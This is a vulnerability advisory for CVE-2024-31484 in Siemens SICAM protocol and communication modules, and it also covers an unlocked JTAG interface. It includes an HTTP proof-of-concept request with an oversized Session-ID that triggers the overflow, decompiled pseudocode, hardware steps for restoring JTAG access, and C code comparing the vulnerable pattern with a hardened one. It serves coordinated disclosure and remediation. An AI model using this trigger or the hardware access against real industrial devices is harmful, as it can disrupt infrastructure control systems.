Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element (extension module for Siemens SICAM AK3/TM/BC), Siemens CP-2016 & CP-2019

Title

Unlocked JTAG interface and buffer overflow

Product

Siemens SM-2558 Protocol Element (extension module for Siemens SICAM AK3/TM/BC), Siemens CP-2016 & CP-2019

Vulnerable Version

See description

Fixed Version

See description

CVE Number

CVE-2024-31484

Impact

high

Found

11.07.2023

By

Stefan Viehböck (Office Linz), Constantin Schieber-Knöbl (Office Vienna) | SEC Consult Vulnerability Lab

The webservers running on the Siemens Communication Elements CPCX26 for CP-2016 and CPCX26 for CP-2019 PLCs as well as on the SM-2558 Protocol Element exposed a buffer overflow vulnerability in the parsing of an HTTP header. Additionally, full access to the JTAG interface of the Zynq-7000 on the SM-2558 module is possible, but the hardware is end of life and won't receive a fix.

Vendor description

"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation


Upgrade to the latest firmware version to mitigate the buffer overflow.

The hardware (SM-2558) is considered end of life (EOL), thus no new version with a fixed JTAG will be released. Restrict physical access to the device.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.


Vulnerability overview/description

1) Unlocked JTAG Interface of Zynq-7000 on SM-2558

The JTAG interface can be accessed with physical access to the PCB. After slightly modifying the hardware it is possible to connect to the interface with full access to the communication module.  

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)

The webserver running on the SM-2558 device as well as on the CP-2016 and CP-2019 is vulnerable to a buffer overflow.

The value of the HTTP header "Session-ID" is processed and used in an "sprintf" call without proper length checking. The target buffer is in the BSS segment and likely 1024 bytes in length. The buffer overflows into several other global data structures.


Proof of concept

1) Unlocked JTAG Interface of Zynq-7000 on SM-2558 

The JTAG interface pins (TDI, TDO, TCK, TMS, GND) are accessible on a populated 20-pin header on the PCB (see figure_1).

A removed connection needs to be restored by soldering an additional wire between two exposed contacts (see figure_2), as the JTAG interface of the Zynq-7000 is daisy-chained with the JTAG interface of the Broadcom BCM53101M Ethernet controller. The pad in question connects to pin A57 (TDI) of the Ethernet controller. After connecting to the pins, a connection to the Zynq-7000 JTAG interface is possible. For example, memory can be dumped (figure 5), execution can be single-stepped (figure 4) or halted (figure 3), and variables can be changed. This grants an attacker with physical access full control of the communication module.

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)

The vulnerability can be triggered with an HTTP POST request similar to the following one:

POST /SICAM_TOOLBOX_1703_remote_connection_01.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9922f30_BOF_PAYLOAD_HERE
Sequence-ID: 525
Content-Length: 54
Content-Type: text/plain
KeepAlive: 5
Connection: close

type=1&length=15&data=0780640202fef1e60000feff0100c2

Here are a few observations with different Session-ID values:

a) Session ID value 3814280BA9922f30 results in normal behavior 

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd0
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

b) Session ID value 3814280BA992fd00000000000000 results in normal behavior 

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd00000000000000
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 0

c) Session ID value 3814280BA992fd00000000000000... (in total 618 characters) results in three HTTP responses 

HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

d) Session ID value 3814280BA992fd00000000000000... (in total 1260 characters) results in an HTTP 500 - internal server error

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Content-Length: 198

<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>Sorry, an unexpected internal server error occurred while processing your request.</p></body></html>

Pseudocode of vulnerable function: 

[...]
    sessiond_id = (char *)get_http_header(a1, (int)"Session-ID"); /* <<< session_id is extracted from the HTTP request */
    if ( !sessiond_id )
      goto LABEL_194;
    if ( unk_51CD1C )
    {
      v11 = 0;
    }
    else
    {
      sub_3DB0E4((unsigned int)byte_51CD08, (unsigned int)sessiond_id, 0x14u);
      v11 = 1;
    }
    if ( sub_15332C() == 1 )
    {
      v134 = 0;
      if ( sub_155BC4(a1, (int)v133) || !v134 )
      {
LABEL_49:
        sequence_id = get_http_header_int(a1, "Sequence-ID");
        sprintf(                      /* <<< response_buffer overflows here: no length check on sessiond_id */
          response_buffer,
          "HTTP/1.1 200 OK\r\n"
          "Server: %s\r\n"
          "Version: %u\r\n"
          "Session-ID: %s\r\n"
          "Sequence-ID: %lu\r\n"
          "Content-Type: text/plain\r\n"
          "Content-Length: 0\r\n"
          "\r\n",
          "SICAM 1703",
          1,
          sessiond_id,
          sequence_id);
[...]
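The following is an added example written for this advisory and is not Siemens' code: it places the unbounded sprintf() pattern from the pseudocode above next to a bounded replacement. The 1024-byte global buffer mirrors the advisory's description; the Session-ID length limit (SESSION_ID_MAX_LEN), the hex-only alphabet check and all function names are assumptions chosen for illustration, not vendor behaviour. The helper try_padded_session_id() constructs Session-ID values made of '0' characters, in the spirit of the padded values observed above, and shows that oversized headers are refused (the caller would answer with an error status) instead of being formatted into the buffer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sizes: RESPONSE_BUFFER_SIZE follows the advisory ("likely 1024 bytes", BSS);
 * SESSION_ID_MAX_LEN is an assumed policy limit, not a vendor value. */
#define RESPONSE_BUFFER_SIZE 1024
#define SESSION_ID_MAX_LEN   32

/* Format string as shown in the advisory's pseudocode (kept as a macro so it
 * stays a string literal at each call site). */
#define RESPONSE_FMT \
    "HTTP/1.1 200 OK\r\n" \
    "Server: %s\r\n" \
    "Version: %u\r\n" \
    "Session-ID: %s\r\n" \
    "Sequence-ID: %lu\r\n" \
    "Content-Type: text/plain\r\n" \
    "Content-Length: 0\r\n" \
    "\r\n"

static char response_buffer[RESPONSE_BUFFER_SIZE]; /* global, as in the advisory */

/* Vulnerable pattern: the attacker-controlled Session-ID is formatted into a
 * fixed-size global buffer with no length check. Shown for comparison only;
 * it is never given untrusted input here. */
int build_response_unsafe(const char *session_id, unsigned long sequence_id)
{
    return sprintf(response_buffer, RESPONSE_FMT, "SICAM 1703", 1u,
                   session_id, sequence_id);
}

/* Length of a string, scanning at most `limit` bytes so a missing terminator
 * cannot carry the scan past the end of the header buffer. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Validate the Session-ID before it reaches any formatting call: non-empty,
 * within the (assumed) policy length, hex characters only. */
int session_id_valid(const char *session_id)
{
    size_t n, i;
    if (session_id == NULL)
        return 0;
    n = bounded_len(session_id, SESSION_ID_MAX_LEN + 1);
    if (n == 0 || n > SESSION_ID_MAX_LEN)
        return 0;
    for (i = 0; i < n; i++) {
        char c = session_id[i];
        int hex = (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
                  (c >= 'A' && c <= 'F');
        if (!hex)
            return 0;
    }
    return 1;
}

/* Hardened builder: rejects bad input, uses snprintf, and treats truncation
 * as an error instead of sending a partial header block. Returns the response
 * length, or -1 when the caller should answer with an error status. */
int build_response_safe(char *out, size_t out_size,
                        const char *session_id, unsigned long sequence_id)
{
    int n;
    if (out == NULL || out_size == 0 || !session_id_valid(session_id))
        return -1;
    n = snprintf(out, out_size, RESPONSE_FMT, "SICAM 1703", 1u,
                 session_id, sequence_id);
    if (n < 0 || (size_t)n >= out_size) {
        out[0] = '\0'; /* would have been truncated (or, with sprintf, overflowed) */
        return -1;
    }
    return n;
}

/* Demonstration helper: a constructed Session-ID of `len` '0' characters run
 * through the hardened builder with an output buffer of `out_size` bytes. */
int try_padded_session_id(size_t len, size_t out_size)
{
    char *sid = malloc(len + 1);
    char *out = malloc(out_size);
    int rc = -1;
    if (sid != NULL && out != NULL) {
        memset(sid, '0', len);
        sid[len] = '\0';
        rc = build_response_safe(out, out_size, sid, 1UL);
    }
    free(sid);
    free(out);
    return rc;
}

int main(void)
{
    printf("16 chars, 1024-byte buffer: %d\n", try_padded_session_id(16, 1024));
    printf("16 chars, 64-byte buffer:   %d\n", try_padded_session_id(16, 64));
    printf("618 chars, 1024-byte buffer: %d\n", try_padded_session_id(618, 1024));
    build_response_unsafe("3814280BA9922f30", 1UL); /* well-formed input only */
    printf("%s", response_buffer);
    return 0;
}
```

The design point is that the check happens twice: once on the untrusted header before any formatting, and once on the snprintf() result, so an oversized value can neither reach the buffer nor leave a silently truncated response on the wire. Logging the -1 path (header name, observed length, source address) also gives operators a detection signal for the 618- and 1260-character requests described above.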

Vulnerable / tested versions

The following version was tested; it was the latest version available at the time of the test:

  • Webserver that runs on Firmware Version 10A45 of the Zynq FPGA.   
  • The Hardware revision of the device was unknown.  

According to the vendor, the following firmware versions for the SM-2558 are affected by CVE-2024-31484:

  • ETA4 Ethernet Interface IEC60870-5-104: All versions < V10.46
  • ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: All versions < V03.27

Note that the same vulnerability exists as well in other products' firmware versions, namely:

  • CPCX26 Central Processing/Communication for CP-2016: All versions < V06.02
  • PCCX26 Ax 1703 PE, Contr, Communication Element for CP-2019: All versions < V06.05

Vendor contact timeline

2024-03-05 Contacting vendor through productcert@siemens.com
2024-03-06 Siemens tracks this as #22436
2024-04-03 Requested status update.
2024-04-03 Siemens can reproduce vulnerabilities and will evaluate buffer overflow. Hardware is EOL, no fix for the JTAG issue.
2024-06-11 Siemens publishes SSA-620338 and confirms the buffer overflow.
2024-07 - 2024-09 Various vacation / absences, delaying advisory coordination.
2024-10-22 Meeting with ProductCERT, discussing release of SM-2558 advisory.
2024-10-31 Sending advisory draft to ProductCERT.
2024-11-14 Receiving feedback on advisory draft.
2024-11-19 Sending updated advisory to ProductCERT.
2024-11-25 Coordinated release of advisory.

Solution

The vendor provides patches for the affected devices / components to fix CVE-2024-31484:

  • ETA4 for SM-2558: Upgrade to V10.46
  • ETA5 for SM-2558: Upgrade to V03.27
  • CPCX26 for CP-2016: Upgrade to V06.02
  • PCCX26 for CP-2019: Upgrade to V06.05

More detailed information can be found in the Siemens Security Advisory SSA-620338:
https://cert-portal.siemens.com/productcert/html/ssa-620338.html

The hardware (SM-2558) is considered end of life (EOL), thus no new version with a fixed JTAG will be released. Restrict physical access to the device.

Workaround

Make sure to strictly limit physical access to the PLCs containing the protocol element during and also after its life cycle.

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Stefan Viehböck, Constantin Schieber-Knöbl / @2024